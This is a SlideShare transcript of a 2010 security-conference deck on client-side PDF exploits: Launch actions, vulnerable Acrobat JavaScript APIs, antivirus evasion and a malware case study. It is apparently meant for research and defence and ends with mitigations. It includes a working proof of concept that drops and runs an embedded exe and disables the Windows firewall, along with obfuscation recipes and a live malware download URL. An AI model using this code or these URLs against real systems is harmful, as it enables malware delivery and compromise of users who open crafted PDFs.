SlideShare a Scribd company logo

Client Side Exploits using PDF

Download as PPT, PDF
n|u - The Open Security Community
n|u - The Open Security Community

The document discusses various client-side exploits that can be performed using PDF files. It begins by providing background on PDFs and how their programming capabilities have led to security issues. It then examines different types of exploits such as launch actions, which can execute files or scripts when a PDF is opened, and AcroJS exploits using vulnerable JavaScript APIs. The document also covers obfuscation techniques used to evade antivirus and provides a case study of embedding an executable into a PDF to automatically execute it. In summary, it analyzes the threats posed by malicious PDFs that abuse the format's programming features to carry out exploits or unwanted code execution on a victim's system.

Technology
1 of 77
BY, ANKUR BHARGAVA (INFOSYS TECHNOLOGIES LIMITED) TAMAGHNA BASU (SECURITY RESEARCHER) Client Side Exploits using PDF C0C0N Security & Hacking Conference
Contents About PDF Launch Action Exploits AcroJs Exploits Road Ahead Tools and References
About PDF • What isPDF? • Incidentsin thewild • Why pdf attcks? • PDF document structure
Potentially Dangerous File / Penetration Document Format Stands for Adobe Portable Document Format Exchange and manipulation of electronic data reliable and platform independent Has become most widespread and used document description format throughout the world
Adobe PDF – As a programming language PDF document is more than a powerful document format Has a complete programming language of its own Dedicated to document creation and manipulation Relatively strong execution features
Adobe PDF – Security Issues
2010: Still Continuing…
2010: Still Continuing… March April May June
Incidents in the wild  Jun 14 CVE-2010-1297 PDF Adobe 0-Day WEO from sacchetti.dana@gmail.com  Jun 20 CVE-2010-1297 PDF Meeting agenda from alexis.mo88@gmail.com  Jun 21 CVE-2010-1297 PDF About the recent US-Japan Economic Relations  Jun 21 CVE-2010-1297 PDF Adobe 0-Day About the recent US-Japan Economic Relations - with Poison Ivy  Jun 27 CVE-2009-0927 PDF Discussion on cross-strait maritime cooperation  Jul 6 CVE-2010-1297 PDF EPA's Water Sampling Report from spoofed OCSPP@epa.go  Jul 14 CVE-2009-4324 PDF President Obama's Detrimental Deadlines
The Reign of Zeus:  Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax and Kneber) is a Trojan horse that steals banking information by keystroke logging.  Found in July 2007 when it was used to steal information from the United States Department of Transportation. It became more widespread in March 2009.  In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of companies like: Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon, BusinessWeek  ZeuS is sold in the criminal underground as a kit for around $3000-$4000, and is likely the one malware most utilized by criminals specializing in financial fraud. ZeuS has evolved over time and includes a full arsenal of information stealing .
The Reign of Zeus A recent breakthrough in spreading Zeus via PDF files threatens to further the spread of Zeus. The pdf file (detected as Exploit.JS.Pdfka.bui) contained an exploit for the CVE-2010- 0188 vulnerability - buffer overflow – manifests itself when the field containing the image is accessed. CVE-2010-0188 exploits statistics 2010
Popular in malwaredomainlist.com
Apple iPhone / iPad / iPod Code Execution and Sandbox Bypass VUPEN ID - VUPEN/ADV-2010-1992 Release date - 2010-08-03 It is caused by a memory corruption error when processing Compact Font Format (CFF) data within a PDF document, which could be exploited by attackers to execute arbitrary code by tricking a user into visiting a specially crafted web page using Mobile Safari
Why PDF Popularity and usability Flexibility, platform independent, rich text Trust level is high on pdf – static piece of information Rich api, easy to exploit / misuse Dominance of Adobe reader, huge scope for attack
PDF document structure The general structure of a PDF file is composed of the following code components: header, body, cross- reference (xref) table, and trailer, as shown in figure 1.
PDF Document Structure PDF Header Objects Trailer Body Cross reference Table
Launch Action • Launch Action Api • SomeExamples • Evading Antivirus • With embedded EXE
Launch Action Vulnerability A launch action launches an application or opens or prints a document. Following are the action dictionary entries specific to this type of action.  ENTRIES  S :Name Required) The type of action that this dictionary describes; shall be Launch for a launch action.  F: File specification (Required if none of the entries Win, Mac, or Unix is present) The application that shall be launched or the document that shall be opened or printed. If this entry is absent and the conforming reader does not understand any of the alternative entries, it shall do nothing.  Win : dictionary (Optional) A dictionary containing Windows-specific launch parameters.
Launch Action Vulnerability  PARAMETERS  F : byte string (Required) The file name of the application that shall be launched or the document that shall be opened or printed, in standard Windows pathname format. If the name string includes a backslash character (), the backslash shall itself be preceded by a backslash. This value shall be a simple string; it is not a file specification.  P : byte string (Optional) A parameter string that shall be passed to the application designated by the F entry. This entry shall be omitted if F designates a document.
Launch Action Vulnerability Open command prompt Open website
Launch Action Vulnerability Open notepad.exe
Launch Action Vulnerability
Launch Action Vulnerability Changing the message
Launch Action Vulnerability Confidential Data!! If You are Authorized Click on 'Open'. Check 'Do Not Show This Message Again' to avoid this dialog next time
Launch Action Vulnerability
Launch Action in 9.3.3
Launch Action Vulnerability
Evading Antivirus by Changing the format You can take any other PDF data type and give it a number by wrapping it in "obj" and "endobj". Then later on, when you want to use that chunk of data, you can reference it, by number, with the "R" operator. These two examples are equivalent to Acrobat 2 0 obj (Hello World) Endobj 3 0 obj << /Example 2 0 R >> Endobj 3 0 obj << /Example (Hello World) >> endobj
Evading Antivirus  What You Can Leave Out  All Page data  All Whitespace, except for End-Of-Line after comments  The version number part of %PDF-1.1  The %%EOF  The xref table  And thus also startxref  Most Object /Types  So what's actually required?  %PDF-anything, but if the file is too confusing for Acrobat, you need at least the first number. Like %PDF-1.  A trailer with a /Root dictionary for the Catalog  A /Pages dictionary, but this can be empty, just as long as it's a dictionary type.  An /OpenAction if you want to launch your Javascript upon file open.  The Javascript Action.
Evading Antivirus %PDF-1. trailer<</Root<</Pages<<>>/ OpenAction<</S/Launch/Wi n<</F(cmd.exe)/P<0A0A0A0 A0A0A0A0A4E6F74653A205 468697320697320612073656 3757265205044462E20546F2 076696577207468652073656 37572656420636F6E74656E7 420706C6561736520636C696 36B2074686520224F70656E 2220627574746F6E2062656C 6F772E>>>>>>>>>
Evading Antivirus
POC: Launching an Embedded exe Step 1 : Embed the hex content of the exe in a vbscript which extracts it out to the file system and runs it. Step 2 : Embed that vbscript in the pdf file as comments. Step 3 : Launch cmd.exe and create another script which extracts out the main vbscript from the pdf and run them both.
Step 1 : Embed the hex content of the exe in a vbscript Dim b,bl Function c(d) c=chr(d) End Function b=Array(c(77),c(90),c(144),c(0),c(3),c(0), c(0)....,"") bl = 3072 Set fso = CreateObject("Scripting.FileSystemObject") Set f = fso.OpenTextFile(“helpme.exe", 2, True) For i = 0 To bl f.write(b(i)) Next f.close() Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run "netsh firewall set opmode disable", 0, True WshShell.Run "helpme.exe", 0, False WshShell.Run "taskkill /IM cmd.exe /F", 0, False Hex content of the exe as a character array
Step 2 : Embed the vbscript in the pdf file as comments %'SS %Dim b,bl;Set WshShell = Function c(d);c=chr(d);End Function;b=Array(c(77),c(90),c(144),c(0),.....,"");bl = 3072;Set fso = CreateObject("Scripting.FileSystemObject");Set f = fso.OpenTextFile("helpme.exe", 2, True);For i = 0 To bl;f.write(b(i));Next;f.close(); Set WshShell = WScript.CreateObject("WScript.Shell") ;WshShell.Run "netsh firewall set opmode disable", 0, True;WshShell.Run "helpme.exe", 0, False;WshShell.Run "taskkill /IM cmd.exe /F", 0, False %'EE 6 0 obj [/PDF /Text] endobj
Step 3 : Launch cmd.exe and create another script /c echo Set fso=CreateObject("Scripting.FileSystemObject") > execute.vbs && echo Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True) >> execute.vbs && echo pf=f.ReadAll >> execute.vbs && echo s=InStr(pf,"'SS") >> execute.vbs && echo e=InStr(pf,"'EE") >> execute.vbs && echo s=Mid(pf,s,e- s) >> execute.vbs && echo Set z=fso.OpenTextFile("toexecute.vbs", 2, True) >> execute.vbs && echo s = Replace(s,"%","") >> execute.vbs && echo s = Replace(s,";",vbcrlf) >> execute.vbs && echo z.Write(s) >> execute.vbs && execute.vbs && toexecute.vbs
Generated VBScript Set fso=CreateObject("Scripting.FileSystemObject") Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True) pf=f.ReadAll s=InStr(pf,"'SS") e=InStr(pf,"'EE") s=Mid(pf,s,e-s) Set z=fso.OpenTextFile("toexecute.vbs", 2, True) s = Replace(s,"%","") s = Replace(s,";",vbcrlf) z.Write(s)
AcroJS • AcroJsApi • VulnerableApi’s • Obfuscation Techniques • CaseStudy
AcroJS • Acrobat JavaScript is the cross-platform scripting language of the Adobe® Acrobat® family of products. • Through JavaScript extensions, the viewer application and its plug-ins expose much of their functionality to document authors, form designers, and plug-in developers. • This functionality includes the following features, – Processing forms within the document – Batch processing collections of PDF documents – Developing and maintaining online collaboration schemes – Communicating with local databases – Controlling multimedia events
JavaScript Actions • A JavaScript action causes a script to be compiled and executed by the JavaScript interpreter. • Depending on the nature of the script, various interactive form fields in the document may update their values or change their visual ap-pearances. PARAMETERS /S Type - name (Required) The type of action that this dictionary describes; must be JavaScript for a JavaScript action. /JS Type - text string or text stream (Required) A text string or text stream containing the JavaScript script to be exe-cuted.
launchURLAlertbox Acrojs examples
Acrojs examples
Acrojs examples
Vulnerable APIs • getIcons() [CVE-2009-0927] – Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3 , and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658. • Util.printf() [CVE-2008-2992][CVE-2008-1104] – Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104. – Stack-based buffer overflow in Foxit Reader before 2.3 build 2912 allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file, related to the util.printf JavaScript function and floating point specifiers in format strings.
Vulnerable APIs • getAnnots() [CVE-2009-1492] – The getAnnots Doc method in the JavaScript API in Adobe Reader and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation, and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments. • customDictionaryOpen() [CVE-2009-1493] – The customDictionaryOpen spell method in the JavaScript API in Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that triggers a call to this method with a long string in the second argument.
Vulnerable APIs • Doc.media.newPlayer [CVE-2009-4324] – Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009. • Collab.collectEmailInfo [CVE-2007-5659] – Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.
Obfuscation Techniques Why?  To make analysis more difficult  To avoid detection by virus scanners Ways?  Using javascript Obfuscation  Using Pdf Obfuscations(Filters)
Javascript Obfuscations : Unlearn Coding Ethics
Distorting format Normal Code Obfuscated Code function execute(data, time) { Timelag=5000; if (time > Timelag) { // some code } } function overflow(hex, loop) { for (i=0;i<loop;i++) { hex = hex + hex; } } function overflow(hex, loop){for (i=0;i<loop;i++){hex = hex + hex;}} function overflow(hex, loop) {for i=0;i<loop;i++){hex = hex + hex;}}
Obfuscating Identifiers Normal Code Obfuscated Code function execute(data, time) { Timelag=5000; if (time > Timelag) { // some code } } function overflow(hex, loop) { for (i=0;i<loop;i++) { hex = hex + hex; } } function aeiou(lIlIIlI, O0OOOO0OO000OO) { WWMWMMWMWMWMW=5000; if (O0OOOO0OO000OO > WWMWMWMWMWMW) { // some code } } function aimpq(xxwmnnx, pqrtxw) { for (dqweaa=0; dqweaa < pqrtxw; dqweaa ++) { xxwmnnx = xxwmnnx + xxwmnnx;; } }
Obfuscating Identifiers – Even Worse Differentiating with number of underscore characters function _____(____,__________) { ______________=5000; if (__________>______________) { // some code } } function ___(_______, ______) { for(________________=0; ________________<______; ________________ ++) { _______ = _______ + _______; } }
Obfuscating Identifiers – Even Worse Differentiating with number of underscore characters function _____(____,__________){______________=5000;if (__________>______________){// some code}}function ___(_______, ______){for(________________=0; ________________<______; ________________ ++){_______ = _______ + _______;}}
Chain of Eval Normal Code Obfuscated code app.alert(“c0c0n”) func="eval"; one='app.alert("c0c0n")'; two=eval(one); three=eval(two); eval(func(three));
Splitting Javascript Normal code Obfuscated Code app.alert(“hello world”); Rt=“);”; Td=“ert(”hel”; Ab=“ap”; Qw=“ld””; Kg=“p.al”; Gh=“lo wor”; Eval(“hh=Ab+Kg+Td+Gh+Qw+Rt”); Eval(hh);
Callee Trick Function accesses its own source and uses it as a key to decrypt code or data function decrypt(cypher) { var key = arguments.callee.toString(); for (var i = 0; i < cypher.length; i++) { plain = key.charCodeAt(i) ^ cypher.charCodeAt(i); } ... }
Pdf obfuscations Using Filters for streams. Most common encoding techniques -  ASCIIHEXDecode,  ASCII85Decode,  LZWDecode,  FlateDecode,  RunLengthDecode
Case Study Malware found from - www.malwaredomainlist.com File link www.bigiqwars.ru/ppp/exp/pdf.php? user=admin&pdf_acces=on Added on – 29th july 2010
Virus total Reports 5/42(11.90%)
Analysis
STEP-1 WGET www.bigiqwars.ru/ppp/exp/pdf.php? user=admin&pdf_acces=on
STEP-2 Behavioral Analysis Environment • By using vm image • Filemon,Processmon,Regmon,TCPView Results • Under Process ‘AcroRD32.exe’ Was trying to connect to remote site http://bigiqwars.ru/ppp/exe.php? spl=PDF (newPlayer)&user=admin&exe_acces=on
STEP-3 Pdfid.py
STEP-4 Static/Code Analysis
Word Editor
Decoded the script
Formatted using jsbeautifier.org
Replacing with meaningful identifiers and removing unnecessary comments
Replacing ‘X’ from parameter
Shellcode Analysis Connecting to… http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on
Road Ahead • Mitigations • Adobe’ssecurity Measures • FutureExploit methods
How can we protect ourselves • Enable automatic updates: it sounds simple, but you will need to turn it on in the software settings to make it happen by default. • Disable PDF browser integration: most browsers will open PDFs without asking. An infected PDF will deliver its payload without warning, hiding in the background. • Always install the latest patch/update, even for older Adobe product versions. • Disable Javascript • Uncheck ‘Allow non-PDF gile attachments with external applications’ to prevent launch action vulnerability. • PDF alternatives such as Foxit are worthwhile, as long as auto updates are turned on, however alternative programs are just as vulnerable to malware as they gain popularity.
Road Ahead Focus Less on javascript exploits Attackers focusing more on embedded objects inside pdf i.e flash Adobe to introduce sandboxing to limit Reader exploits
Tools And References
Tools used Malzilla Mozilla addon javascript deobfescator by Wladimir Palant Vmware Player Sysinternal tools Processmon,filemon,regmon,tcpview WinHex HexEdit
References  www.malwaredomainlist.com  www.adobe.com/  www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on  www.blog.didierstevens.com  www.jsbeautifier.org  http://research.globalthoughtz.com  http://www.zdnet.com/  http://www.scansafe.com/  http://www.computerworld.com/s/article/9176117/  http://www.darkreading.com/  http://www.virustotal.com/  http://recon.cx/  http://www.blog.zynamics.com
References continued..  http://www.marketwire.com/  http://www.symantec.com/  http://www.securelist.com/en/analysis  http://contagiodump.blogspot.com/  http://www.f-secure.com/  http://www.securelist.com/  http://www.secureworks.com/  http://en.wikipedia.org/  http://www.malwaredomainlist.com/  http://blogs.adobe.com/  http://blog.fireeye.com/  http://intrepidusgroup.com/  http://www.vupen.com
Thank you Tamaghna Basu tamaghna.basu@gmail.com twitter.comtitanlambda tamahawk-techguru.blogspot.com Ankur Bhargava ankurbhargava87@gmail.com

Recommended

BuildKitの概要と最近の機能
BuildKitの概要と最近の機能BuildKitの概要と最近の機能
BuildKitの概要と最近の機能
Kohei Tokunaga
 
今からでも遅くないDBマイグレーション - Flyway と SchemaSpy の紹介 -
今からでも遅くないDBマイグレーション - Flyway と SchemaSpy の紹介 -今からでも遅くないDBマイグレーション - Flyway と SchemaSpy の紹介 -
今からでも遅くないDBマイグレーション - Flyway と SchemaSpy の紹介 -
onozaty
 
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitBlack Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Paula Januszkiewicz
 
Blazing Performance with Flame Graphs
Blazing Performance with Flame GraphsBlazing Performance with Flame Graphs
Blazing Performance with Flame Graphs
Brendan Gregg
 
徳丸本ができるまで
徳丸本ができるまで徳丸本ができるまで
徳丸本ができるまでHiroshi Tokumaru
 
InnoDB Locking Explained with Stick Figures
InnoDB Locking Explained with Stick FiguresInnoDB Locking Explained with Stick Figures
InnoDB Locking Explained with Stick Figures
Karwin Software Solutions LLC
 
雑なMySQLパフォーマンスチューニング
雑なMySQLパフォーマンスチューニング雑なMySQLパフォーマンスチューニング
雑なMySQLパフォーマンスチューニング
yoku0825
 
ユーザー情報格納基盤におけるApache Pulsarの利用事例
ユーザー情報格納基盤におけるApache Pulsarの利用事例ユーザー情報格納基盤におけるApache Pulsarの利用事例
ユーザー情報格納基盤におけるApache Pulsarの利用事例
Yahoo!デベロッパーネットワーク
 

Recommended

BuildKitの概要と最近の機能
BuildKitの概要と最近の機能BuildKitの概要と最近の機能
BuildKitの概要と最近の機能
Kohei Tokunaga
 
今からでも遅くないDBマイグレーション - Flyway と SchemaSpy の紹介 -
今からでも遅くないDBマイグレーション - Flyway と SchemaSpy の紹介 -今からでも遅くないDBマイグレーション - Flyway と SchemaSpy の紹介 -
今からでも遅くないDBマイグレーション - Flyway と SchemaSpy の紹介 -
onozaty
 
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption ToolkitBlack Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Black Hat Europe 2017. DPAPI and DPAPI-NG: Decryption Toolkit
Paula Januszkiewicz
 
Blazing Performance with Flame Graphs
Blazing Performance with Flame GraphsBlazing Performance with Flame Graphs
Blazing Performance with Flame Graphs
Brendan Gregg
 
徳丸本ができるまで
徳丸本ができるまで徳丸本ができるまで
徳丸本ができるまでHiroshi Tokumaru
 
InnoDB Locking Explained with Stick Figures
InnoDB Locking Explained with Stick FiguresInnoDB Locking Explained with Stick Figures
InnoDB Locking Explained with Stick Figures
Karwin Software Solutions LLC
 
雑なMySQLパフォーマンスチューニング
雑なMySQLパフォーマンスチューニング雑なMySQLパフォーマンスチューニング
雑なMySQLパフォーマンスチューニング
yoku0825
 
ユーザー情報格納基盤におけるApache Pulsarの利用事例
ユーザー情報格納基盤におけるApache Pulsarの利用事例ユーザー情報格納基盤におけるApache Pulsarの利用事例
ユーザー情報格納基盤におけるApache Pulsarの利用事例
Yahoo!デベロッパーネットワーク
 
MySQL 5.7にやられないためにおぼえておいてほしいこと
MySQL 5.7にやられないためにおぼえておいてほしいことMySQL 5.7にやられないためにおぼえておいてほしいこと
MySQL 5.7にやられないためにおぼえておいてほしいこと
yoku0825
 
MySQL 5.7の罠があなたを狙っている
MySQL 5.7の罠があなたを狙っているMySQL 5.7の罠があなたを狙っている
MySQL 5.7の罠があなたを狙っている
yoku0825
 
DeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows KernelDeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows Kernel
Peter Hlavaty
 
ソーシャルゲーム案件におけるDB分割のPHP実装
ソーシャルゲーム案件におけるDB分割のPHP実装ソーシャルゲーム案件におけるDB分割のPHP実装
ソーシャルゲーム案件におけるDB分割のPHP実装
infinite_loop
 
これからLDAPを始めるなら 「389-ds」を使ってみよう
これからLDAPを始めるなら 「389-ds」を使ってみようこれからLDAPを始めるなら 「389-ds」を使ってみよう
これからLDAPを始めるなら 「389-ds」を使ってみよう
Nobuyuki Sasaki
 
Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版
Masahito Zembutsu
 
PHPという概念が存在しない退屈な世界 - AWS LambdaでWebAPP編
PHPという概念が存在しない退屈な世界 - AWS LambdaでWebAPP編PHPという概念が存在しない退屈な世界 - AWS LambdaでWebAPP編
PHPという概念が存在しない退屈な世界 - AWS LambdaでWebAPP編
Yoshihiro Ohsuka
 
How to use the new Domino Query Language
How to use the new Domino Query LanguageHow to use the new Domino Query Language
How to use the new Domino Query Language
Tim Davis
 
え、まって。その並列分散処理、Kafkaのしくみでもできるの? Apache Kafkaの機能を利用した大規模ストリームデータの並列分散処理
え、まって。その並列分散処理、Kafkaのしくみでもできるの? Apache Kafkaの機能を利用した大規模ストリームデータの並列分散処理え、まって。その並列分散処理、Kafkaのしくみでもできるの? Apache Kafkaの機能を利用した大規模ストリームデータの並列分散処理
え、まって。その並列分散処理、Kafkaのしくみでもできるの? Apache Kafkaの機能を利用した大規模ストリームデータの並列分散処理
NTT DATA Technology & Innovation
 
What's New in MySQL 5.7 Optimizer @MySQL User Conference Tokyo 2015
What's New in MySQL 5.7 Optimizer @MySQL User Conference Tokyo 2015What's New in MySQL 5.7 Optimizer @MySQL User Conference Tokyo 2015
What's New in MySQL 5.7 Optimizer @MySQL User Conference Tokyo 2015
Mikiya Okuno
 
フロントからバックエンドまで - WebAssemblyで広がる可能性
フロントからバックエンドまで - WebAssemblyで広がる可能性フロントからバックエンドまで - WebAssemblyで広がる可能性
フロントからバックエンドまで - WebAssemblyで広がる可能性
IIJ
 
[2019] 200만 동접 게임을 위한 MySQL 샤딩
[2019] 200만 동접 게임을 위한 MySQL 샤딩[2019] 200만 동접 게임을 위한 MySQL 샤딩
[2019] 200만 동접 게임을 위한 MySQL 샤딩
NHN FORWARD
 
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
Kohei Tokunaga
 
なかったらINSERTしたいし、あるならロック取りたいやん?
なかったらINSERTしたいし、あるならロック取りたいやん?なかったらINSERTしたいし、あるならロック取りたいやん?
なかったらINSERTしたいし、あるならロック取りたいやん?
ichirin2501
 
DAT202_Getting started with Amazon Aurora
DAT202_Getting started with Amazon AuroraDAT202_Getting started with Amazon Aurora
DAT202_Getting started with Amazon Aurora
Amazon Web Services
 
Tools for Metaspace
Tools for MetaspaceTools for Metaspace
Tools for Metaspace
Takahiro YAMADA
 
Javaのログ出力: 道具と考え方
Javaのログ出力: 道具と考え方Javaのログ出力: 道具と考え方
Javaのログ出力: 道具と考え方
Taku Miyakawa
 
Where狙いのキー、order by狙いのキー
Where狙いのキー、order by狙いのキーWhere狙いのキー、order by狙いのキー
Where狙いのキー、order by狙いのキー
yoku0825
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecture
hugo lu
 
HTTP/2の現状とこれから
HTTP/2の現状とこれからHTTP/2の現状とこれから
HTTP/2の現状とこれから
shigeki_ohtsu
 
Client side exploits
Client side exploitsClient side exploits
Client side exploits
nickyt8
 
Testing web application firewalls (waf) accuracy
Testing web application firewalls (waf) accuracyTesting web application firewalls (waf) accuracy
Testing web application firewalls (waf) accuracy
Ory Segal
 

More Related Content

What's hot

MySQL 5.7にやられないためにおぼえておいてほしいこと
MySQL 5.7にやられないためにおぼえておいてほしいことMySQL 5.7にやられないためにおぼえておいてほしいこと
MySQL 5.7にやられないためにおぼえておいてほしいこと
yoku0825
 
MySQL 5.7の罠があなたを狙っている
MySQL 5.7の罠があなたを狙っているMySQL 5.7の罠があなたを狙っている
MySQL 5.7の罠があなたを狙っている
yoku0825
 
DeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows KernelDeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows Kernel
Peter Hlavaty
 
ソーシャルゲーム案件におけるDB分割のPHP実装
ソーシャルゲーム案件におけるDB分割のPHP実装ソーシャルゲーム案件におけるDB分割のPHP実装
ソーシャルゲーム案件におけるDB分割のPHP実装
infinite_loop
 
これからLDAPを始めるなら 「389-ds」を使ってみよう
これからLDAPを始めるなら 「389-ds」を使ってみようこれからLDAPを始めるなら 「389-ds」を使ってみよう
これからLDAPを始めるなら 「389-ds」を使ってみよう
Nobuyuki Sasaki
 
Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版
Masahito Zembutsu
 
PHPという概念が存在しない退屈な世界 - AWS LambdaでWebAPP編
PHPという概念が存在しない退屈な世界 - AWS LambdaでWebAPP編PHPという概念が存在しない退屈な世界 - AWS LambdaでWebAPP編
PHPという概念が存在しない退屈な世界 - AWS LambdaでWebAPP編
Yoshihiro Ohsuka
 
How to use the new Domino Query Language
How to use the new Domino Query LanguageHow to use the new Domino Query Language
How to use the new Domino Query Language
Tim Davis
 
え、まって。その並列分散処理、Kafkaのしくみでもできるの? Apache Kafkaの機能を利用した大規模ストリームデータの並列分散処理
え、まって。その並列分散処理、Kafkaのしくみでもできるの? Apache Kafkaの機能を利用した大規模ストリームデータの並列分散処理え、まって。その並列分散処理、Kafkaのしくみでもできるの? Apache Kafkaの機能を利用した大規模ストリームデータの並列分散処理
え、まって。その並列分散処理、Kafkaのしくみでもできるの? Apache Kafkaの機能を利用した大規模ストリームデータの並列分散処理
NTT DATA Technology & Innovation
 
What's New in MySQL 5.7 Optimizer @MySQL User Conference Tokyo 2015
What's New in MySQL 5.7 Optimizer @MySQL User Conference Tokyo 2015What's New in MySQL 5.7 Optimizer @MySQL User Conference Tokyo 2015
What's New in MySQL 5.7 Optimizer @MySQL User Conference Tokyo 2015
Mikiya Okuno
 
フロントからバックエンドまで - WebAssemblyで広がる可能性
フロントからバックエンドまで - WebAssemblyで広がる可能性フロントからバックエンドまで - WebAssemblyで広がる可能性
フロントからバックエンドまで - WebAssemblyで広がる可能性
IIJ
 
[2019] 200만 동접 게임을 위한 MySQL 샤딩
[2019] 200만 동접 게임을 위한 MySQL 샤딩[2019] 200만 동접 게임을 위한 MySQL 샤딩
[2019] 200만 동접 게임을 위한 MySQL 샤딩
NHN FORWARD
 
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
Kohei Tokunaga
 
なかったらINSERTしたいし、あるならロック取りたいやん?
なかったらINSERTしたいし、あるならロック取りたいやん?なかったらINSERTしたいし、あるならロック取りたいやん?
なかったらINSERTしたいし、あるならロック取りたいやん?
ichirin2501
 
DAT202_Getting started with Amazon Aurora
DAT202_Getting started with Amazon AuroraDAT202_Getting started with Amazon Aurora
DAT202_Getting started with Amazon Aurora
Amazon Web Services
 
Tools for Metaspace
Tools for MetaspaceTools for Metaspace
Tools for Metaspace
Takahiro YAMADA
 
Javaのログ出力: 道具と考え方
Javaのログ出力: 道具と考え方Javaのログ出力: 道具と考え方
Javaのログ出力: 道具と考え方
Taku Miyakawa
 
Where狙いのキー、order by狙いのキー
Where狙いのキー、order by狙いのキーWhere狙いのキー、order by狙いのキー
Where狙いのキー、order by狙いのキー
yoku0825
 
The linux networking architecture
The linux networking architectureThe linux networking architecture
The linux networking architecture
hugo lu
 
HTTP/2の現状とこれから
HTTP/2の現状とこれからHTTP/2の現状とこれから
HTTP/2の現状とこれから
shigeki_ohtsu
 

What's hot (20)

MySQL 5.7にやられないためにおぼえておいてほしいこと
MySQL 5.7にやられないためにおぼえておいてほしいことMySQL 5.7にやられないためにおぼえておいてほしいこと
MySQL 5.7にやられないためにおぼえておいてほしいこと
 
MySQL 5.7の罠があなたを狙っている
MySQL 5.7の罠があなたを狙っているMySQL 5.7の罠があなたを狙っている
MySQL 5.7の罠があなたを狙っている
 
DeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows KernelDeathNote of Microsoft Windows Kernel
DeathNote of Microsoft Windows Kernel
 
ソーシャルゲーム案件におけるDB分割のPHP実装
ソーシャルゲーム案件におけるDB分割のPHP実装ソーシャルゲーム案件におけるDB分割のPHP実装
ソーシャルゲーム案件におけるDB分割のPHP実装
 
これからLDAPを始めるなら 「389-ds」を使ってみよう
これからLDAPを始めるなら 「389-ds」を使ってみようこれからLDAPを始めるなら 「389-ds」を使ってみよう
これからLDAPを始めるなら 「389-ds」を使ってみよう
 
Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版Dockerfileを改善するためのBest Practice 2019年版
Dockerfileを改善するためのBest Practice 2019年版
 
PHPという概念が存在しない退屈な世界 - AWS LambdaでWebAPP編
PHPという概念が存在しない退屈な世界 - AWS LambdaでWebAPP編PHPという概念が存在しない退屈な世界 - AWS LambdaでWebAPP編
PHPという概念が存在しない退屈な世界 - AWS LambdaでWebAPP編
 
How to use the new Domino Query Language
How to use the new Domino Query LanguageHow to use the new Domino Query Language
How to use the new Domino Query Language
 
え、まって。その並列分散処理、Kafkaのしくみでもできるの? Apache Kafkaの機能を利用した大規模ストリームデータの並列分散処理
え、まって。その並列分散処理、Kafkaのしくみでもできるの? Apache Kafkaの機能を利用した大規模ストリームデータの並列分散処理え、まって。その並列分散処理、Kafkaのしくみでもできるの? Apache Kafkaの機能を利用した大規模ストリームデータの並列分散処理
え、まって。その並列分散処理、Kafkaのしくみでもできるの? Apache Kafkaの機能を利用した大規模ストリームデータの並列分散処理
 
What's New in MySQL 5.7 Optimizer @MySQL User Conference Tokyo 2015
What's New in MySQL 5.7 Optimizer @MySQL User Conference Tokyo 2015What's New in MySQL 5.7 Optimizer @MySQL User Conference Tokyo 2015
What's New in MySQL 5.7 Optimizer @MySQL User Conference Tokyo 2015
 
フロントからバックエンドまで - WebAssemblyで広がる可能性
フロントからバックエンドまで - WebAssemblyで広がる可能性フロントからバックエンドまで - WebAssemblyで広がる可能性
フロントからバックエンドまで - WebAssemblyで広がる可能性
 
[2019] 200만 동접 게임을 위한 MySQL 샤딩
